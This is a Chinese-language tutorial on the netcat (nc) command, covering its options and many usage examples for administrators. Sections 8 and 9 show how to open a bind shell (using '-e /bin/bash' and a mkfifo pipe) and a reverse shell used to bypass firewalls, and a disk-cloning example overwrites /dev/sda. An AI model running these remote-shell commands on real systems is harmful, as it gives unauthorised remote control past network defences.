ps.ubuntu自帶的nc是netcat-openbsd版,不帶-c/-e參數。
pss.在線Markdown編輯器的bug是怎么回事...“#”號依然顯示着
參數
想要連接到某處: nc [-options] hostname port[s] [ports] …
綁定端口等待連接: nc -l port [-options] [hostname] [port]
- -g<網關>:設置路由器躍程通信網關,最多設置8個;
- -G<指向器數目>:設置來源路由指向器,其數值為4的倍數;
- -h:在線幫助;
- -i<延遲秒數>:設置時間間隔,以便傳送信息及掃描通信端口;
- -l:使用監聽模式,監控傳入的資料;
- -n:直接使用ip地址,而不通過域名服務器;
- -o<輸出文件>:指定文件名稱,把往來傳輸的數據以16進制字碼傾倒成該文件保存;
- -p<通信端口>:設置本地主機使用的通信端口;
- -r:指定源端口和目的端口都進行隨機的選擇;
- -s<來源位址>:設置本地主機送出數據包的IP地址;
- -u:使用UDP傳輸協議;
- -v:顯示指令執行過程;
- -w<超時秒數>:設置等待連線的時間;
- -z:使用0輸入/輸出模式,只在掃描通信端口時使用。
## 用法 ---
[A Server(192.168.1.1) B Client(192.168.1.2)]
0.
連接到遠程主機:
$nc -nvv 192.168.x.x 80
連到192.168.x.x的TCP80端口.
監聽本地主機:
$nc -l 80
監聽本機的TCP80端口.
超時控制:
多數情況我們不希望連接一直保持,那么我們可以使用 -w 參數來指定連接的空閑超時時間,該參數緊接一個數值,代表秒數,如果連接超過指定時間則連接會被終止。
Server
$nc -l 2389
Client
$ nc -w 10 localhost 2389
該連接將在 10 秒后中斷。
注意: 不要在服務器端同時使用 -w 和 -l 參數,因為 -w 參數將在服務器端無效果。
1.端口掃描
端口掃描經常被系統管理員和黑客用來發現在一些機器上開放的端口,幫助他們識別系統中的漏洞。
$nc -z -v -n 192.168.1.1 21-25
可以運行在TCP或者UDP模式,默認是TCP,-u參數調整為udp.
z 參數告訴netcat使用0 IO,連接成功后立即關閉連接, 不進行數據交換.
v 參數指詳細輸出.
n 參數告訴netcat 不要使用DNS反向查詢IP地址的域名.
以上命令會打印21到25 所有開放的端口。
$nc -v 127.0.0.1 22
localhost [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4"為Banner信息。Banner是一個文本,Banner是一個你連接的服務發送給你的文本信息。當你試圖鑒別漏洞或者服務的類型和版本的時候,Banner信息是非常有用的。但是,並不是所有的服務都會發送banner.一旦你發現開放的端口,你可以容易的使用netcat 連接服務抓取他們的banner。
2.Chat Server
假如你想和你的朋友聊聊,有很多的軟件和信息服務可以供你使用。但是,如果你沒有這么奢侈的配置,比如你在計算機實驗室,所有的對外的連接都是被限制的,你怎樣和整天坐在隔壁房間的朋友溝通那?不要郁悶了,netcat提供了這樣一種方法,你只需要創建一個Chat服務器,一個預先確定好的端口,這樣子他就可以聯系到你了。
Server
$nc -l 20000
netcat 命令在20000端口啟動了一個tcp 服務器,所有的標准輸出和輸入會輸出到該端口。輸出和輸入都在此shell中展示。
Client
$nc 192.168.1.1 20000
不管你在機器B上鍵入什么都會出現在機器A上。
3.文件傳輸
大部分時間中,我們都在試圖通過網絡或者其他工具傳輸文件。有很多種方法,比如FTP,SCP,SMB等等,但是當你只是需要臨時或者一次傳輸文件,真的值得浪費時間來安裝配置一個軟件到你的機器上嘛。假設,你想要傳一個文件file.txt 從A 到B。A或者B都可以作為服務器或者客戶端.
Server
$nc -l 20000 < file.txt
Client
$nc -n 192.168.1.1 20000 > file.txt
這里我們創建了一個服務器在A上並且重定向netcat的輸入為文件file.txt,那么當任何成功連接到該端口,netcat會發送file的文件內容。
在客戶端我們重定向輸出到file.txt,當B連接到A,A發送文件內容,B保存文件內容到file.txt.
沒有必要創建文件源作為Server,我們也可以相反的方法使用。像下面的我們發送文件從B到A,但是服務器創建在A上,這次我們僅需要重定向netcat的輸出並且重定向B的輸入文件。
B作為Server
Server
$nc -l 20000 > file.txt
Client
$nc 192.168.1.2 20000 < file.txt
#### 4.目錄傳輸 --- 發送一個文件很簡單,但是如果我們想要發送多個文件,或者整個目錄,一樣很簡單,只需要使用壓縮工具tar,壓縮后發送壓縮包。 如果你想要通過網絡傳輸一個目錄從A到B。 ##### Server
$tar -cvf – dir_name | nc -l 20000
Client
$nc -n 192.168.1.1 20000 | tar -xvf -
這里在A服務器上,我們創建一個tar歸檔包並且通過-在控制台重定向它,然后使用管道,重定向給netcat,netcat可以通過網絡發送它。
在客戶端我們下載該壓縮包通過netcat 管道然后打開文件。
如果想要節省帶寬傳輸壓縮包,我們可以使用bzip2或者其他工具壓縮。
Server
$tar -cvf – dir_name| bzip2 -z | nc -l 20000
通過bzip2壓縮
Client
$nc -n 192.168.1.1 20000 | bzip2 -d |tar -xvf -
#### 5. 加密你通過網絡發送的數據 --- 如果你擔心你在網絡上發送數據的安全,你可以在發送你的數據之前用如mcrypt的工具加密。 ##### Server
$nc localhost 20000 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
使用mcrypt工具加密數據。
Client
$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 20000
使用mcrypt工具解密數據。
以上兩個命令會提示需要密碼,確保兩端使用相同的密碼。
這里我們是使用mcrypt用來加密,使用其它任意加密工具都可以。
6.流視頻
雖然不是生成流視頻的最好方法,但如果服務器上沒有特定的工具,使用netcat,我們仍然有希望做成這件事。
Server
$cat video.avi | nc -l 20000
這里我們只是從一個視頻文件中讀入並重定向輸出到netcat客戶端
Client
$nc 192.168.1.1 20000 | mplayer -vo x11 -cache 3000 -
這里我們從socket中讀入數據並重定向到mplayer。
7,克隆一個設備
如果你已經安裝配置一台Linux機器並且需要重復同樣的操作對其他的機器,而你不想在重復配置一遍。不在需要重復配置安裝的過程,只啟動另一台機器的一些引導可以隨身碟和克隆你的機器。
克隆Linux PC很簡單,假如你的系統在磁盤/dev/sda上
Server
$dd if=/dev/sda | nc -l 20000
Client
$nc -n 192.168.1.1 20000 | dd of=/dev/sda
dd是一個從磁盤讀取原始數據的工具,我通過netcat服務器重定向它的輸出流到其他機器並且寫入到磁盤中,它會隨着分區表拷貝所有的信息。但是如果我們已經做過分區並且只需要克隆root分區,我們可以根據我們系統root分區的位置,更改sda 為sda1,sda2.等等。
8.打開一個shell
我們已經用過遠程shell-使用telnet和ssh,但是如果這兩個命令沒有安裝並且我們沒有權限安裝他們,我們也可以使用netcat創建遠程shell。
假設你的netcat支持 -c -e 參數(原生 netcat)
Server
$nc -l 20000 -e /bin/bash -i
Client
$nc 192.168.1.1 20000
這里我們已經創建了一個netcat服務器並且表示當它連接成功時執行/bin/bash
假如netcat 不支持-c 或者 -e 參數(openbsd netcat),我們仍然能夠創建遠程shell
Server
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo
這里我們創建了一個fifo文件,然后使用管道命令把這個fifo文件內容定向到shell 2>&1中。是用來重定向標准錯誤輸出和標准輸出,然后管道到netcat 運行的端口20000上。至此,我們已經把netcat的輸出重定向到fifo文件中。
說明:
從網絡收到的輸入寫到fifo文件中
cat 命令讀取fifo文件並且其內容發送給sh命令
sh命令進程受到輸入並把它寫回到netcat。
netcat 通過網絡發送輸出到client
至於為什么會成功是因為管道使命令平行執行,fifo文件用來替代正常文件,因為fifo使讀取等待而如果是一個普通文件,cat命令會盡快結束並開始讀取空文件。
在客戶端僅僅簡單連接到服務器
Client
$nc -n 192.168.1.1 20000
你會得到一個shell提示符在客戶端
9.反向shell
反向shell是指在客戶端打開的shell。反向shell這樣命名是因為不同於其他配置,這里服務器使用的是由客戶提供的服務。
Server
$nc -l 20000
在客戶端,簡單地告訴netcat在連接完成后,執行shell。
Client
$nc 192.168.1.1 20000 -e /bin/bash
現在,什么是反向shell的特別之處呢
反向shell經常被用來繞過防火牆的限制,如阻止入站連接。例如,我有一個專用IP地址為192.168.1.1,我使用代理服務器連接到外部網絡。如果我想從網絡外部訪問 這台機器如1.2.3.4的shell,那么我會用反向外殼用於這一目的。
10.指定源端口
假設你的防火牆過濾除25端口外其它所有端口,你需要使用-p選項指定源端口。
Server
$nc -l 20000
Client
$nc 192.168.1.1 20000 25
使用1024以內的端口需要root權限。
該命令將在客戶端開啟25端口用於通訊,否則將使用隨機端口。
11.指定源地址
假設你的機器有多個地址,希望明確指定使用哪個地址用於外部數據通訊。我們可以在netcat中使用-s選項指定ip地址。
Server
$nc -u -l 20000 < file.txt
Client
$nc -u 192.168.1.1 20000 -s 172.31.100.5 > file.txt
該命令將綁定地址172.31.100.5。
12.靜態web頁面服務器
新建一個網頁,命名為somepage.html;
新建一個shell script:
while true; do
nc -l 80 -q 1 < somepage.html;
done
用root權限執行,然后在瀏覽器中輸入127.0.0.1打開看看是否正確運行。
nc 指令通常都是給管理者進行除錯或測試等動作用的,所以如果只是單純需要臨時的網頁伺服器,使用 Python 的 SimpleHTTPServer 模組會比較方便。
13.模擬HTTP Headers
$nc www.huanxiangwu.com 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser
HTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]
在nc命令后,輸入紅色部分的內容,然后按兩次回車,即可從對方獲得HTTP Headers內容。
13.Netcat支持IPv6
netcat 的 -4 和 -6 參數用來指定 IP 地址類型,分別是 IPv4 和 IPv6:
Server
$ nc -4 -l 2389
Client
$ nc -4 localhost 2389
然后我們可以使用 netstat 命令來查看網絡的情況:
$ netstat | grep 2389
tcp 0 0 localhost:2389 localhost:50851 ESTABLISHED
tcp 0 0 localhost:50851 localhost:2389 ESTABLISHED
接下來我們看看IPv6 的情況:
Server
$ nc -6 -l 2389
Client
$ nc -6 localhost 2389
再次運行 netstat 命令:
$ netstat | grep 2389
tcp6 0 0 localhost:2389 localhost:33234 ESTABLISHED
tcp6 0 0 localhost:33234 localhost:2389 ESTABLISHED
前綴是 tcp6 表示使用的是 IPv6 的地址。
14.在 Netcat 中禁止從標准輸入中讀取數據
該功能使用 -d 參數,請看下面例子:
Server
$ nc -l 2389
Client
$ nc -d localhost 2389
Hi
你輸入的 Hi 文本並不會送到服務器端。
15.強制 Netcat 服務器端保持啟動狀態
如果連接到服務器的客戶端斷開連接,那么服務器端也會跟着退出。
Server
$ nc -l 2389
Client
$ nc localhost 2389
^C
Server
$ nc -l 2389
$
上述例子中,但客戶端斷開時服務器端也立即退出。
我們可以通過 -k 參數來控制讓服務器不會因為客戶端的斷開連接而退出。
Server
$ nc -k -l 2389
Client
$ nc localhost 2389
^C
Server
$ nc -k -l 2389
#### 16.配置 Netcat 客戶端不會因為 EOF 而退出 --- Netcat 客戶端可以通過 -q 參數來控制接收到 EOF 后隔多長時間才退出,該參數的單位是秒: ##### Client
$nc -q 5 localhost 2389
現在如果客戶端接收到 EOF ,它將等待 5 秒后退出。
17.手動使用 SMTP 協定寄信
在測試郵件伺服器是否正常時,可以使用這樣的方式手動寄送 Email:
$nc localhost 25 << EOF
HELO host.example.com
MAIL FROM: <user@host.example.com>
RCPT TO: <user2@host.example.com>
DATA
Body of email.
.
QUIT
EOF
#### 18.透過代理伺服器(Proxy)連線 --- 這指令會使用 10.2.3.4:8080 這個代理伺服器,連線至 host.example.com 的42端口。
$nc -x10.2.3.4:8080 -Xconnect host.example.com 42
#### 19.使用 Unix Domain Socket --- 這行指令會建立一個 Unix Domain Socket,並接收資料:
$nc -lU /var/tmp/dsocket
參考鏈接:
Linux Netcat 命令——網絡工具中的瑞士軍刀
nc/netcat命令
linux nc (NetCat) 命令詳解
Linux nc (netcat) 詳解
8 個實用的 Linux netcat 命令示例
Netcat(Linux nc 指令)網路管理者工具實用範例
Linux下利用nc命令來監控檢測服務器的端口使用情況
[討論] 求解:linux下nc的轉發port的用法